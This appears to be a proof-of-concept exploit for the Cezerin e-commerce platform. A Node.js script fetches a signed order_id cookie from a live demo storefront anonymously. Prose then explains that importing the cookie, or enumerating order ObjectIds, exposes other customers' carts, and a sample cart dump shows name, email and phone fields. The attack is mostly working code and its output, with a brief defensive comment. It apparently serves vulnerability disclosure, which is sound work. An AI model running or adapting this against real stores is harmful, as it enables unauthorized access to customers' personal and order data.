const axios = require("axios");
// 62b9728e9352df6441630054 — the order ObjectId observed in the sample run below; it is the
// top-level "id" of the cart/order JSON and is embedded in the signed order_id cookie value.
//
// Request configuration for the storefront GET. The headers mimic a desktop browser; note that
// NO Cookie header is sent, i.e. the request carries no prior session. The Referer is taken
// verbatim from the first CLI argument (`node <script> <referer-url>`), so from the server's
// point of view it is caller-controlled. NOTE(review): the dump below contains a
// "referrer_url" field — presumably populated from this header, but that is not shown here.
let config = {
headers: {
'Host': 'plusha.cezerin.net',
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate, br',
// Caller-supplied; undefined if the script is run without an argument.
'Referer': process.argv[2],
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'Pragma': 'no-cache',
'Cache-Control': 'no-cache'
}
};
// Fetch the storefront root and print the value of the first cookie the server sets.
// In the sample run the server answers an anonymous GET with an order_id cookie whose value
// looks like a signed cookie (`s%3A<ObjectId>.<signature>`, URL-encoded) for a draft order.
// Defensive takeaway: the order/cart identifier alone should not be enough to read the
// cart; access needs to be bound to the session that created it.
(async () => {
await axios.get('https://plusha.cezerin.net/', config)
// NOTE(review): assumes a Set-Cookie header is present and that the wanted cookie is the
// first one — `headers['set-cookie'][0]` throws otherwise, and since the chain has no
// .catch() that surfaces as an unhandled rejection. The logged value is everything after
// the first '=' up to the first ';' (cookie value only, attributes dropped).
.then(data => console.log(`success : order_id=${data.headers['set-cookie'][0].split('=')[1].split(';')[0]}` ));
})();
success : order_id=s%3A62b9728e9352df6441630054.x%2FwysOvDVq9nNwXO4N3tFmZpki7lvEHMgqtNAkAoTuw
Now that we have a valid signed order_id cookie, importing that cookie into the browser gives access to the customer's cart with all its details; you can also perform an attack on the objectId, listing carts that contain customer data:
{
"date_created":"2022-06-27T09:04:14.558Z",
"date_placed":null,
"date_updated":"2022-06-27T09:05:31.311Z",
"date_closed":null,
"date_paid":null,
"date_cancelled":null,
"number":1002,
"shipping_status":"",
"items":[
{
"product_image":[
{
"id":"5e1653f2f60c02051954ed72",
"alt":"",
"position":99,
"filename":"cezerin.png",
"url":"https://cezerin.net/images/products/5e1639ae0c86ec14224a4645/cezerin.png"
}
],
"id":"62b9728e9352df6441630055",
"product_id":"5e1639ae0c86ec14224a4645",
"variant_id":null,
"quantity":2,
"discount_total":0,
"name":"Product A",
"price":850,
"price_total":1700,
"sku":"product-a",
"tax_class":null,
"tax_total":0,
"variant_name":"",
"weight":0.5,
"image_url":"https://cezerin.net/images/products/5e1639ae0c86ec14224a4645/cezerin.png",
"path":"/category-a/product-a",
"stock_quantity":10000
}
],
"transactions":[
],
"discounts":[
],
"billing_address":{
"full_name":"",
"address1":"",
"address2":"",
"city":"",
"country":"",
"postal_code":"",
"state":"",
"phone":"",
"company":"",
"tax_number":"",
"coordinates":{
"latitude":"",
"longitude":""
},
"details":null
},
"shipping_address":{
"full_name":"backer 68 ",
"address1":"",
"address2":"",
"city":"",
"country":"",
"postal_code":"",
"state":"",
"phone":"",
"company":"",
"tax_number":"",
"coordinates":{
"latitude":"",
"longitude":""
},
"details":null
},
"tax_rate":0,
"shipping_tax":0,
"shipping_discount":0,
"shipping_price":0,
"item_tax_included":true,
"shipping_tax_included":true,
"closed":false,
"cancelled":false,
"delivered":false,
"paid":false,
"hold":false,
"draft":true,
"first_name":"backer 68",
"last_name":"",
"password":"",
"email":"[email protected]",
"mobile":"+5 (555) 555-5555",
"referrer_url":"https://cezerin.org/",
"landing_url":"https://plusha.cezerin.net/",
"channel":"",
"note":"",
"comments":"",
"coupon":"",
"tracking_number":"",
"customer_id":null,
"status_id":null,
"payment_method_id":null,
"shipping_method_id":"5e1639ae0c86ec14224a464e",
"tags":[
],
"id":"62b9728e9352df6441630054",
"status":"",
"shipping_method":"Courier",
"payment_method":"",
"payment_method_gateway":"",
"weight_total":1,
"discount_total":0,
"subtotal":1700,
"tax_included_total":0,
"tax_total":0,
"shipping_total":0,
"grand_total":1700
}